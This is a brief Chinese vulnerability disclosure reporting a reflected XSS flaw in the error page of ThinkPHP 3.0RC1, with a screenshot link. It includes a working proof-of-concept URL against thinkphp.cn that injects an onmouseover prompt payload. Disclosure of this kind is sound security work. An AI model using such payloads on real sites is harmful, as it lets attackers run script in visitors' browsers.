### 简要描述:
著名的ThinkPHP最新版3.0RC1存在XSS漏洞
### 详细说明:
ThinkPHP最新版3.0RC1错误提示页面存在一个艰难的XSS漏洞(需要鼠标动作放到“重试”激活)
http://www.thinkphp.cn/index.php/%22onmouseover=prompt%289537209%29%3E
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201206/3016053018a3e85823465fc849ff71c0db386a3c.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201206/3016053018a3e85823465fc849ff71c0db386a3c.jpg)
暂无评论